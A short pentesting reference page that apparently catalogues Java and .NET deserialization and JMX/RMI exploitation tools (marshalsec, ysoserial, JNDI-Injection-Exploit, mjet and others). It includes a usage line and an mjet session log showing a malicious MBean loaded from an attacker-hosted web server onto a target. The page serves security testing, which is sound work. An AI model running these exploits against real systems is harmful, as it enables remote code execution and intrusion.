# (De)serialization

[**marshalsec**](https://github.com/mbechler/marshalsec): Java Unmarshaller Security - Turning your data into code execution.

```
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
```

**ysoserial:** A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

[**ysoserial.net**](https://github.com/pwntester/ysoserial.net)**:** Deserialization payload generator for a variety of .NET formatters.

[**rmiscout**](https://github.com/BishopFox/rmiscout): RMIScout enables wordlist and bruteforce attacks against exposed Java RMI interfaces to safely guess method signatures without invocation. It supports multiple Java RMI protocols, method invocation, and exploitation.

[**JNDI-Injection-Exploit**](https://github.com/welk1n/JNDI-Injection-Exploit)**:** JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on [marshals](https://github.com/mbechler/marshalsec) and modified further to link with HTTP server.

[**beanshooter**](https://github.com/qtc-de/beanshooter)**:** *Beanshooter* is a command line tool written in *Java*, which helps to identify common vulnerabilities on *JMX* endpoints.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXDL3bNEzDyFSbBSsuQ%2F-MXDLDVWEwD8jUkoQI5t%2F01-demo.gif?alt=media\&token=7312bd56-a1de-4050-b177-7197a8be4999)

[**mjet**](https://github.com/mogwailabs/mjet): MJET allows easy exploitation of insecure configured JMX services. Additional background information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) and [here](https://www.owasp.org/images/c/c1/JMX_-_Java_Management_Extensions_-_Hans-Martin_Muench.pdf).

```
h0ng10@rocksteady ~/w/mjet> java -jar jython-standalone-2.7.0.jar mjet.py 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://10.165.188.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
10.165.188.23 - - [26/Apr/2019 21:50:37] "GET / HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
h0ng10@rocksteady ~/w/mjet> 
```